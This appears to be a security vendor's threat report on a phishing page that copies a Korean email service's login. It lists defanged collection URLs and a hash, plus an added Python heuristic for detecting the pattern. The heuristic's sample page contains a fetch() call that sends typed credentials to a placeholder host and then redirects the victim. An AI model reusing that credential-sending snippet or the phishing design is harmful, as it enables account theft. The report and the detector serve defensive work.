The ASEC analysis team has identified the distribution of a malicious website in Korea that aims to steal account credentials for a well-known Korean email service.
The phishing website that the email redirects to is disguised as the login page of this Korean email service, and over 50 cases in Korea were confirmed to have accessed it. Users must therefore take particular caution when logging into this email service.

Figure 1. Normal webpage (left) vs phishing webpage (right)
The phishing website is disguised as the login page of the Korean email service as shown below. When the user enters the ID and password of their account and clicks ‘Login’, the entered credentials are forwarded to the threat actor’s server (hxxps://as-massage[.]ch/wp-includes/mindx/nkuego.php), and the user is then redirected to the legitimate website to complete the deception.

Figure 2. The account stealing logic inside the phishing website’s javascript

Figure 3. Stealing the account credentials

Figure 4. Redirection to the normal website
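As an added, defender-side illustration of the pattern described above (not code from the ASEC post): a small heuristic that flags a page which carries a password field, sends data to a host other than its own or the legitimate service's, and then moves the browser to the legitimate site. The sample page and every hostname in it are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample imitating the behaviour described above: the page is served
# from one host, sends the typed credentials to a second host, then moves the
# browser to the legitimate login page. Every hostname here is a placeholder.
PAGE_URL = "https://phish.example/login.html"
LEGIT_HOST = "mail.example"  # assumed stand-in for the real email service
SAMPLE_HTML = """
<form id="login"><input name="id"><input name="pw" type="password">
<button type="submit">Login</button></form>
<script>
document.getElementById('login').onsubmit = function (e) {
  e.preventDefault();
  fetch('https://exfil.example/wp-includes/x/post.php', {method: 'POST',
        body: new URLSearchParams({id: id.value, pw: pw.value})});
  window.location = 'https://mail.example/';
};
</script>"""

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
PASSWORD_RE = re.compile(r"""type\s*=\s*["']password["']""", re.I)

def offsite_urls(html, page_url, legit_host):
    """Absolute URLs in the page whose host is neither the page's nor the legitimate site's."""
    own = {urlparse(page_url).hostname, legit_host}
    return sorted({u for u in URL_RE.findall(html) if urlparse(u).hostname not in own})

def redirects_to(html, legit_host):
    """True if a script assigns location (or calls replace/assign) with the legitimate host."""
    pat = (r"""(?:location(?:\.href)?\s*=|location\.(?:replace|assign)\()\s*["']https?://"""
           + re.escape(legit_host))
    return re.search(pat, html) is not None

def assess(html, page_url, legit_host):
    """Combine the three signals; all three together is the pattern from the post."""
    result = {
        "password_field": PASSWORD_RE.search(html) is not None,
        "offsite_urls": offsite_urls(html, page_url, legit_host),
        "redirect_to_legit": redirects_to(html, legit_host),
    }
    result["verdict"] = (result["password_field"] and bool(result["offsite_urls"])
                         and result["redirect_to_legit"])
    return result

if __name__ == "__main__":
    print(assess(SAMPLE_HTML, PAGE_URL, LEGIT_HOST))
```

The heuristic only looks at absolute URLs and direct location assignments, so obfuscated scripts need a rendered-DOM or proxy-log check instead.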
A total of 2 phishing websites disguised as this email service have been confirmed so far, and it is likely that other unidentified URLs exist as well.
| Confirmed phishing websites |
|---|
| Account siphoning URL: hxxps://as-massage[.]ch/wp-includes/mindx/nkuego.php |
| Account siphoning URL: hxxps://trinimcvx.000webhostapp[.]com/post.php |

Figure 5. Number of users who have accessed the above phishing website
V3 Lite is currently responding by blocking the URL as shown below.

Figure 6. V3 blocking phishing website
[IOC Info]
hxxps://as-massage[.]ch/wp-includes/mindx/nkuego.php
hxxps://trinimcvx.000webhostapp[.]com/post.php
9C3ADF3D9F1D5FFA55B3E45283494D4F
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.